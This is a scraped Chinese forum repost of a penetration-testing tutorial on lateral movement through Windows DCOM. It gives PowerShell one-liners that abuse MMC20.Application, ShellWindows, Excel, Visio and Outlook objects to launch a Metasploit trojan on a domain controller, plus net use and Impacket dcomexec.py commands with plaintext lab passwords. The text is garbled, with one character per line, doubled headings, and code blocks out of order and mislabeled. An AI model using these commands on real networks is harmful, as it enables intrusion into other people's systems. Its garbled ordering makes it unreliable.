论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[22114] 2021-06-28_内网渗透测试:利用DCOM进行横向渗透
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-18
渗透测试
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-06-28_内网渗透测试:利用DCOM进行横向渗透
内
网
渗
透
测
试
:
利
用
D
C
O
M
进
行
横
向
渗
透
转
自
f
r
e
e
b
u
f
L
e
m
o
n
S
e
c
2
0
2
1
-
0
6
-
2
8
C
O
M
C
O
M
即
组
件
对
象
模
型
(
C
o
m
p
o
n
e
n
t
O
b
j
e
c
t
M
o
d
e
l
,
C
O
M
)
,
是
基
于
W
i
n
d
o
w
s
平
台
的
一
套
组
件
对
象
接
口
标
准
组
件
对
象
接
口
标
准
,
由
一
组
构
造
规
范
构
造
规
范
和
组
件
对
象
库
组
件
对
象
库
组
成
。
C
O
M
是
许
多
微
软
产
品
和
技
术
,
如
W
i
n
d
o
w
s
媒
体
播
放
器
和
W
i
n
d
o
w
s
S
e
r
v
e
r
的
基
础
。
一
般
的
对
象
是
由
数
据
成
员
和
作
用
在
其
上
的
方
法
组
成
,
而
组
件
对
象
和
一
般
对
象
虽
有
相
似
性
,
但
又
有
较
大
不
同
。
组
件
对
象
不
使
用
方
法
而
用
接
口
来
描
述
自
身
。
接
口
被
定
义
为
“
在
对
象
上
实
现
的
一
组
语
义
上
相
关
的
功
能
”
,
其
实
质
是
一
组
函
数
指
针
表
,
每
个
指
针
必
须
初
始
化
指
向
某
个
具
体
的
函
数
体
,
一
个
组
件
对
象
实
现
的
接
口
数
量
没
有
限
制
。
D
C
O
M
D
C
O
M
(
分
布
式
组
件
对
象
模
型
)
是
微
软
基
于
组
件
对
象
模
型
(
C
O
M
)
的
一
系
列
概
念
和
程
序
接
口
,
它
支
持
不
同
的
两
台
机
器
上
的
组
件
间
的
通
信
,
不
论
它
们
是
运
行
在
局
域
网
、
广
域
网
、
还
是
I
n
t
e
r
n
e
t
上
。
利
用
这
个
接
口
,
客
户
端
程
序
对
象
能
够
向
网
络
中
另
一
台
计
算
机
上
的
服
务
器
程
序
对
象
发
送
请
求
。
D
C
O
M
是
C
O
M
(
组
件
对
象
模
型
)
的
扩
展
,
它
允
许
应
用
程
序
实
例
化
和
访
问
远
程
计
算
机
上
C
O
M
对
象
的
属
性
和
方
法
。
D
C
O
M
使
用
远
程
过
程
调
用
(
R
P
C
)
技
术
将
组
件
对
象
模
型
(
C
O
M
)
的
功
能
扩
展
到
本
地
计
算
机
之
外
,
因
此
,
在
远
程
系
统
上
托
管
C
O
M
服
务
器
端
的
软
件
(
通
常
在
D
L
L
或
e
x
e
中
)
可
以
通
过
R
P
C
向
客
户
端
公
开
其
方
法
。
攻
击
者
可
使
用
D
C
O
M
进
行
横
向
移
动
,
通
过
D
C
O
M
,
攻
击
者
可
在
拥
有
适
当
权
限
的
情
况
下
通
过
O
f
f
i
c
e
应
用
程
序
以
及
包
含
不
安
全
方
法
的
其
他
W
i
n
d
o
w
s
对
象
远
程
执
行
命
令
。
使
用
D
C
O
M
进
行
横
向
移
动
的
优
势
之
一
在
于
,
在
远
程
主
机
上
执
行
的
进
程
将
会
是
托
管
在
远
程
主
机
上
执
行
的
进
程
将
会
是
托
管
C
O
M
服
务
器
端
的
软
件
服
务
器
端
的
软
件
。
例
如
我
们
滥
用
S
h
e
l
l
B
r
o
w
s
e
r
W
i
n
d
o
w
C
O
M
对
象
,
那
么
就
会
在
远
程
主
机
的
现
有
e
x
p
l
o
r
e
r
.
e
x
e
进
程
中
执
行
。
对
攻
击
者
而
言
,
这
无
疑
能
够
增
强
隐
蔽
性
,
由
于
有
大
量
程
序
都
会
向
D
C
O
M
公
开
方
法
,
因
此
防
御
者
可
能
难
以
全
面
监
测
所
有
程
序
的
执
行
。
在
本
地
通
过
在
本
地
通
过
D
C
O
M
执
行
命
令
执
行
命
令
测
试
环
境
:
W
i
n
d
o
w
s
7
1
.
获
取
本
地
获
取
本
地
D
C
O
M
程
序
列
表
程
序
列
表
在
p
o
w
e
r
s
h
e
l
l
中
执
行
如
下
命
令
获
取
D
C
O
M
程
序
列
表
:
G
e
t
-
C
i
m
I
n
s
t
a
n
c
e
这
个
c
m
d
l
e
(
p
o
w
e
r
s
h
e
l
l
命
令
行
)
默
认
只
在
p
o
w
e
r
s
h
e
l
l
3
.
0
以
上
版
本
中
存
在
,
所
以
只
有
W
i
n
d
o
w
s
s
e
r
v
e
r
2
0
1
2
及
以
上
版
本
的
操
作
系
统
才
可
以
使
用
G
e
t
-
C
i
m
i
n
s
t
a
n
c
e
。
W
i
n
d
o
w
s
7
、
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
中
默
认
安
装
的
是
p
o
w
e
r
s
h
e
l
l
2
.
0
,
所
以
他
们
都
不
支
持
G
e
t
-
C
i
m
I
n
s
t
a
n
c
e
,
可
以
用
以
下
命
令
代
替
G
e
t
-
C
i
m
I
n
s
t
a
n
c
e
:
G
e
t
-
C
i
m
I
n
s
t
a
n
c
e
W
i
n
3
2
_
D
C
O
M
A
p
p
l
i
c
a
t
i
o
n
G
e
t
-
W
m
i
O
b
j
e
c
t
-
N
a
m
e
s
p
a
c
e
R
O
O
T
C
I
M
V
2
-
C
l
a
s
s
W
i
n
3
2
_
D
C
O
M
A
p
p
l
i
c
a
t
i
o
n
2
.
本
地
使
用
本
地
使
用
D
C
O
M
执
行
任
意
命
令
执
行
任
意
命
令
我
们
在
获
取
D
C
O
M
应
用
程
序
的
时
候
,
遇
到
了
一
个
M
M
C
A
p
p
l
i
c
a
t
i
o
n
C
l
a
s
s
(
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
)
:
这
个
C
O
M
对
象
可
以
编
程
M
M
C
管
理
单
元
操
作
的
组
件
脚
本
。
我
们
在
本
地
启
动
一
个
管
理
员
权
限
的
p
o
w
e
r
s
h
e
l
l
,
执
行
如
下
命
令
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
交
互
,
创
建
一
个
“
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
”
对
象
的
实
例
(
我
们
只
需
要
提
供
一
个
D
C
O
M
P
r
o
g
I
D
和
一
个
I
P
地
址
,
就
返
回
一
个
C
O
M
对
象
的
实
例
)
:
获
得
C
O
M
对
象
的
实
例
后
,
我
们
还
可
以
执
行
如
下
命
令
枚
举
这
个
C
O
M
对
象
中
的
不
同
方
法
和
属
性
:
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
2
7
.
0
.
0
.
1
"
)
)
#
此
时
可
执
行
如
下
命
令
获
得
"
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
"
支
持
的
操
作
$
c
o
m
.
D
o
c
u
m
e
n
t
.
A
c
t
i
v
e
V
i
e
w
|
G
e
t
-
M
e
m
b
e
r
如
上
图
,
可
以
发
现
该
对
象
有
一
个
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
方
法
,
可
用
来
执
行
命
令
。
然
后
再
通
过
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
执
行
命
令
,
这
里
启
动
计
算
器
:
如
上
图
所
示
,
本
地
命
令
执
行
成
功
。
除
了
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
,
还
有
S
h
e
l
l
W
i
n
d
o
w
s
、
S
h
e
l
l
B
r
o
w
s
e
r
W
i
n
d
o
w
、
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
以
及
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
等
等
都
可
以
为
我
们
所
利
用
。
我
们
通
过
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
的
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
方
法
在
本
地
运
行
了
一
个
“
计
算
器
”
程
序
。
如
果
我
们
提
供
一
个
远
程
主
机
的
I
P
,
便
可
以
使
用
或
命
令
通
过
P
o
w
e
r
s
h
e
l
l
与
远
程
D
C
O
M
进
行
交
互
,
只
需
要
提
供
$
c
o
m
.
D
o
c
u
m
e
n
t
.
A
c
t
i
v
e
V
i
e
w
.
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
(
'
c
m
d
.
e
x
e
'
,
$
n
u
l
l
,
"
/
c
c
a
l
c
.
e
x
e
"
,
"
M
i
n
i
m
i
z
e
d
"
)
/
/
启
动
计
算
器
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
P
r
o
g
I
D
,
I
P
)
)
[
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
T
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
C
L
S
I
D
,
I
P
)
)
D
C
O
M
P
r
o
g
I
D
和
对
方
的
I
P
地
址
,
就
会
向
对
方
提
供
该
D
C
O
M
对
象
的
实
例
,
然
后
就
可
以
利
用
这
个
D
C
O
M
应
用
程
序
和
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
方
法
来
在
对
方
目
标
主
机
上
执
行
命
令
了
。
如
果
攻
击
者
把
“
计
算
器
”
程
序
换
成
恶
意
的
p
a
y
l
o
a
d
,
就
会
对
系
统
安
全
造
成
威
胁
。
下
面
进
行
演
示
使
用
D
C
O
M
对
远
程
主
机
执
行
命
令
。
使
用
使
用
D
C
O
M
对
远
程
主
机
执
行
命
令
对
远
程
主
机
执
行
命
令
下
面
通
过
几
个
实
验
来
演
示
如
何
使
用
D
C
O
M
在
远
程
主
机
上
面
执
行
命
令
。
在
使
用
该
方
法
时
,
需
要
具
有
以
下
条
件
:
具
有
管
理
员
权
限
的
P
o
w
e
r
S
h
e
l
l
可
能
需
要
关
闭
目
标
系
统
的
防
火
墙
。
在
远
程
主
机
上
执
行
命
令
时
,
必
须
使
用
域
管
的
a
d
m
i
n
i
s
t
r
a
t
o
r
账
户
或
者
目
标
主
机
具
有
管
理
员
权
限
的
账
户
(
(
1
)
调
用
)
调
用
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
远
程
执
行
命
令
远
程
执
行
命
令
测
试
环
境
如
下
:
如
图
中
,
右
侧
是
一
个
内
网
环
境
,
域
名
为
g
o
d
.
o
r
g
,
有
三
台
机
器
:
W
i
n
d
o
w
s
7
(
跳
板
机
)
、
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
(
D
C
)
、
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
3
。
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
(
1
9
2
.
1
6
8
.
5
2
.
1
3
8
)
为
域
控
制
器
(
机
器
名
为
O
W
A
)
,
假
设
攻
击
者
已
经
获
得
了
域
成
员
主
机
W
i
n
d
o
w
s
7
的
一
个
管
理
员
权
限
的
m
e
t
e
r
p
r
e
t
e
r
,
需
要
进
一
步
横
向
渗
透
去
拿
下
内
网
的
其
他
机
器
。
域
成
员
服
务
器
(
W
i
n
d
o
w
s
7
)
:
I
P
地
址
:
1
9
2
.
1
6
8
.
5
2
.
1
4
3
用
户
名
:
A
m
i
n
i
s
t
r
a
t
o
r
密
码
:
L
i
u
7
8
9
6
3
域
控
制
器
D
C
(
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
)
:
I
P
地
址
:
1
9
2
.
1
6
8
.
5
2
.
1
3
8
用
户
名
:
L
i
u
k
a
i
f
e
n
g
0
1
密
码
:
L
i
u
7
8
9
6
3
1
.
先
控
制
跳
板
机
先
控
制
跳
板
机
W
i
n
d
o
w
s
7
通
过
通
过
i
p
c
连
接
到
远
程
主
机
连
接
到
远
程
主
机
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
2
.
然
后
在
然
后
在
W
i
n
d
o
w
s
7
跳
板
机
上
传
一
个
新
的
跳
板
机
上
传
一
个
新
的
m
e
t
a
s
p
l
o
i
t
木
马
程
序
木
马
程
序
s
h
e
l
l
.
e
x
e
,
并
控
制
,
并
控
制
W
i
n
d
o
w
s
7
使
用
使
用
c
o
p
y
命
令
将
命
令
将
s
h
e
l
l
.
e
x
e
复
制
到
复
制
到
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
的
的
c
盘
上
面
去
。
盘
上
面
去
。
建
立
i
p
c
连
接
并
上
传
木
马
后
,
攻
击
机
上
开
启
一
个
新
的
m
s
f
监
听
。
3
.
然
后
控
制
然
后
控
制
W
i
n
d
o
w
s
7
对
对
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
执
行
远
程
命
令
执
行
远
程
命
令
在
W
i
n
d
o
w
s
7
的
m
e
t
e
r
p
r
e
t
e
r
中
输
入
如
下
命
令
,
加
载
p
o
w
e
r
s
h
e
l
l
模
块
并
进
入
p
o
w
e
r
s
h
e
l
l
交
互
模
式
:
在
p
o
w
e
r
s
h
e
l
l
执
行
如
下
命
令
:
n
e
t
u
s
e
1
9
2
.
1
6
8
.
5
2
.
1
3
8
i
p
c
$
"
L
i
u
7
8
9
6
3
"
/
u
s
e
r
:
A
m
i
n
i
s
t
r
a
t
o
r
l
o
a
d
p
o
w
e
r
s
h
e
l
l
p
o
w
e
r
s
h
e
l
l
_
s
h
e
l
l
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
/
/
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
此
外
,
我
们
只
需
要
提
供
一
个
D
C
O
M
P
r
o
g
I
D
和
一
个
I
P
地
址
,
然
后
,
它
就
从
远
程
返
回
一
个
C
O
M
对
象
的
实
例
。
/
/
然
后
执
行
如
下
命
令
,
我
们
就
可
以
调
用
"
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
"
方
法
在
远
程
主
机
上
启
动
进
程
$
c
o
m
.
D
o
c
u
m
e
n
t
.
A
c
t
i
v
e
V
i
e
w
.
E
x
e
c
u
t
e
S
h
e
l
l
C
o
m
m
a
n
d
(
'
c
m
d
.
e
x
e
'
,
$
n
u
l
l
,
"
/
c
C
:
s
h
e
l
l
.
e
x
e
"
,
"
M
i
n
i
m
i
z
e
d
"
)
如
上
图
所
示
,
内
网
中
的
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
主
机
成
功
上
线
。
(
(
2
)
调
用
)
调
用
S
h
e
l
l
W
i
n
d
o
w
s
远
程
执
行
命
令
远
程
执
行
命
令
实
验
环
境
:
还
是
上
面
那
个
实
验
环
境
,
同
样
还
是
先
控
制
跳
板
机
W
i
n
d
o
w
s
7
通
过
i
p
c
连
接
到
内
网
主
机
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
,
并
控
制
W
i
n
d
o
w
s
7
使
用
c
o
p
y
命
令
将
s
h
e
l
l
.
e
x
e
上
传
到
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
的
c
盘
上
面
去
。
最
后
进
入
W
i
n
d
o
w
s
7
的
p
o
w
e
r
s
h
e
l
l
,
控
制
W
i
n
d
o
w
s
7
对
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
执
行
远
程
命
令
,
执
行
位
于
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
的
c
盘
里
的
马
:
#
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
创
建
S
h
e
l
l
W
i
n
d
o
w
s
对
象
的
实
例
:
$
c
o
m
=
[
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
T
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
'
9
B
A
0
5
9
7
2
-
F
6
A
8
-
1
1
C
F
-
A
4
4
2
-
0
0
A
0
C
9
0
A
8
F
3
9
'
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
然
后
执
行
如
下
命
令
,
我
们
就
可
以
调
用
该
对
象
的
"
S
h
e
l
l
E
x
e
c
u
t
e
"
方
法
在
远
程
主
机
上
启
动
进
程
:
$
c
o
m
.
i
t
e
m
(
)
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
S
h
e
l
l
E
x
e
c
u
t
e
(
"
c
m
d
.
e
x
e
"
,
"
/
c
C
:
s
h
e
l
l
.
e
x
e
"
,
"
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
"
,
$
n
u
l
l
,
0
)
完
整
的
命
令
完
整
的
命
令
:
[
A
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
T
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
‘
9
B
A
0
5
9
7
2
-
F
6
A
8
-
1
1
C
F
-
A
4
4
2
-
0
0
A
0
C
9
0
A
8
F
3
9
’
,
”
1
9
2
.
1
6
8
.
5
2
.
1
3
8
”
)
)
.
i
t
e
m
(
)
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
S
h
e
l
l
E
x
e
c
u
t
e
(
“
c
m
d
.
e
x
e
”
,
”
/
c
C
:
s
h
e
l
l
.
e
x
e
”
,
”
c
:
w
i
n
d
o
w
s
s
y
s
t
e
m
3
2
”
,
$
n
u
l
l
,
0
)
如
上
图
所
示
,
内
网
中
的
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
主
机
成
功
上
线
。
以
上
这
两
种
方
法
均
适
用
于
W
i
n
d
o
w
s
7
~
W
i
n
d
o
w
s
1
0
、
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
~
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
6
的
系
统
。
并
且
无
论
是
否
事
先
建
立
i
p
c
连
接
都
可
以
成
功
执
行
命
令
,
也
就
不
需
要
对
方
主
机
的
凭
据
,
只
只
需
要
当
前
主
机
的
管
理
员
权
限
即
可
。
除
了
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
和
S
h
e
l
l
W
i
n
d
o
w
s
,
还
有
以
下
这
几
种
D
C
O
M
对
象
都
可
以
被
我
们
利
用
。
(
(
3
)
调
用
)
调
用
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
远
程
执
行
命
令
远
程
执
行
命
令
使
用
方
法
如
下
:
(
(
4
)
调
用
)
调
用
S
h
e
l
l
B
r
o
w
s
e
r
W
i
n
d
o
w
远
程
执
行
命
令
远
程
执
行
命
令
使
用
条
件
:
适
用
于
W
i
n
d
o
w
s
1
0
和
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
R
2
等
版
本
的
系
统
。
使
用
方
法
如
下
:
(
(
5
)
调
用
)
调
用
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
远
程
执
行
命
令
远
程
执
行
命
令
使
用
条
件
:
目
标
主
机
中
安
装
有
V
i
s
i
o
。
#
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
创
建
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
对
象
的
实
例
:
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
p
r
o
g
I
D
(
"
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
$
c
o
m
.
D
i
s
p
l
a
y
A
l
e
r
t
s
=
$
f
a
l
s
e
#
然
后
执
行
如
下
命
令
,
我
们
就
可
以
调
用
该
对
象
的
"
D
D
E
I
n
i
t
i
a
t
e
"
方
法
在
远
程
主
机
上
启
动
进
程
:
$
c
o
m
.
D
D
E
I
n
i
t
i
a
t
e
(
"
c
m
d
.
e
x
e
"
,
"
/
c
C
:
s
h
e
l
l
.
e
x
e
"
)
#
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
创
建
E
x
c
e
l
.
A
p
p
l
i
c
a
t
i
o
n
对
象
的
实
例
:
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
"
C
0
8
A
F
D
9
0
-
F
2
A
1
-
1
1
D
1
-
8
4
5
5
-
0
0
A
0
C
9
1
F
3
8
8
0
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
然
后
执
行
如
下
命
令
,
我
们
就
可
以
调
用
该
对
象
的
"
s
h
e
l
l
E
x
e
c
u
t
e
"
方
法
在
远
程
主
机
上
启
动
进
程
:
$
c
o
m
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
#
完
整
的
命
令
:
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
C
L
S
I
D
(
"
C
0
8
A
F
D
9
0
-
F
2
A
1
-
1
1
D
1
-
8
4
5
5
-
0
0
A
0
C
9
1
F
3
8
8
0
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
使
用
方
法
如
下
:
(
(
6
)
调
用
)
调
用
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
远
程
执
行
命
令
远
程
执
行
命
令
使
用
条
件
:
目
标
主
机
中
安
装
有
O
u
t
l
o
o
k
。
通
过
O
u
t
l
o
o
k
创
建
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
对
象
来
实
现
命
令
行
执
行
:
I
m
p
a
c
k
e
t
里
的
里
的
d
c
o
m
e
x
e
c
.
p
y
脚
本
脚
本
I
m
p
a
c
k
e
t
里
面
提
供
的
d
c
o
m
e
x
e
c
.
p
y
脚
本
可
以
提
供
一
个
类
似
于
w
m
i
e
x
e
c
.
p
y
脚
本
的
半
交
互
式
s
h
e
l
l
,
但
使
用
的
是
D
C
O
M
,
目
前
支
持
M
M
C
2
0
.
A
p
p
l
i
c
a
t
i
o
n
,
S
h
e
l
l
W
i
n
d
o
w
s
和
S
h
e
l
l
B
r
o
w
s
e
r
W
i
n
d
o
w
对
象
。
命
令
格
式
如
下
:
实
验
环
境
:
假
设
攻
击
者
已
经
获
得
了
域
内
主
机
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
的
控
制
权
,
并
获
得
了
域
管
理
员
的
用
户
名
和
密
码
,
下
面
演
示
使
用
d
c
o
m
e
x
e
c
.
p
y
脚
本
进
一
步
获
取
W
i
n
d
o
w
s
7
的
s
h
e
l
l
。
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
除
具
有
内
网
I
P
以
外
还
具
有
公
网
I
P
,
W
i
n
d
o
w
s
7
只
有
没
有
公
网
I
P
,
只
有
内
网
I
P
。
首
先
我
们
在
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
上
上
传
代
理
程
序
,
在
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
1
2
的
1
0
8
0
端
口
上
搭
建
一
个
s
o
c
k
s
代
理
服
务
器
,
然
后
攻
击
者
配
置
一
下
p
r
o
x
y
c
h
a
i
n
s
:
#
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
创
建
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
对
象
的
实
例
:
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
然
后
执
行
如
下
命
令
,
我
们
就
可
以
调
用
该
对
象
的
"
s
h
e
l
l
E
x
e
c
u
t
e
"
方
法
在
远
程
主
机
上
启
动
进
程
:
$
c
o
m
.
[
0
]
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
c
a
l
c
.
e
x
e
"
)
#
完
整
的
命
令
:
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
.
[
0
]
.
D
o
c
u
m
e
n
t
.
A
p
p
l
i
c
a
t
i
o
n
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
#
通
过
P
o
w
e
r
S
h
e
l
l
与
D
C
O
M
进
行
远
程
交
互
,
创
建
V
i
s
i
o
.
A
p
p
l
i
c
a
t
i
o
n
对
象
的
实
例
:
$
c
o
m
=
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
#
然
后
执
行
如
下
命
令
,
通
过
O
u
t
l
o
o
k
创
建
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
对
象
并
执
行
命
令
:
$
c
o
m
.
c
r
e
a
t
e
O
b
j
e
c
t
(
"
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
"
)
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
#
完
整
的
命
令
:
[
a
c
t
i
v
a
t
o
r
]
:
:
C
r
e
a
t
e
I
n
s
t
a
n
c
e
(
[
t
y
p
e
]
:
:
G
e
t
T
y
p
e
F
r
o
m
P
r
o
g
I
D
(
"
O
u
t
l
o
o
k
.
A
p
p
l
i
c
a
t
i
o
n
"
,
"
1
9
2
.
1
6
8
.
5
2
.
1
3
8
"
)
)
.
c
r
e
a
t
e
O
b
j
e
c
t
(
"
S
h
e
l
l
.
A
p
p
l
i
c
a
t
i
o
n
"
)
.
s
h
e
l
l
E
x
e
c
u
t
e
(
"
C
:
s
h
e
l
l
.
e
x
e
"
)
.
/
d
c
o
m
e
x
e
c
.
p
y
d
o
m
a
i
n
/
u
s
e
r
n
a
m
e
:
p
a
s
s
w
o
r
d
@
i
p
.
/
d
c
o
m
e
x
e
c
.
p
y
d
o
m
a
i
n
/
u
s
e
r
n
a
m
e
:
p
a
s
s
w
o
r
d
@
i
p
<
c
o
m
m
a
n
d
>
此
时
,
我
们
便
可
以
使
用
p
r
o
x
y
c
h
a
i
n
s
将
攻
击
者
的
d
c
o
m
e
x
e
c
.
p
y
代
理
进
入
内
网
了
:
如
果
没
有
获
取
到
明
文
密
码
,
我
们
还
可
以
直
接
利
用
哈
希
值
来
代
替
p
r
o
x
y
c
h
a
i
n
s
4
p
y
t
h
o
n
3
.
/
d
c
o
m
e
x
e
c
.
p
y
g
o
d
/
a
d
m
i
n
i
s
t
r
a
t
o
r
:
L
i
u
7
8
9
6
3
@
1
9
2
.
1
6
8
.
1
0
.
2
0
/
/
获
取
目
标
主
机
的
s
h
e
l
l
p
r
o
x
y
c
h
a
i
n
s
4
p
y
t
h
o
n
3
.
/
d
c
o
m
e
x
e
c
.
p
y
g
o
d
/
a
d
m
i
n
i
s
t
r
a
t
o
r
:
L
i
u
7
8
9
6
3
@
1
9
2
.
1
6
8
.
1
0
.
2
0
w
h
o
a
m
i
/
/
在
目
标
主
机
上
执
行
命
令
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试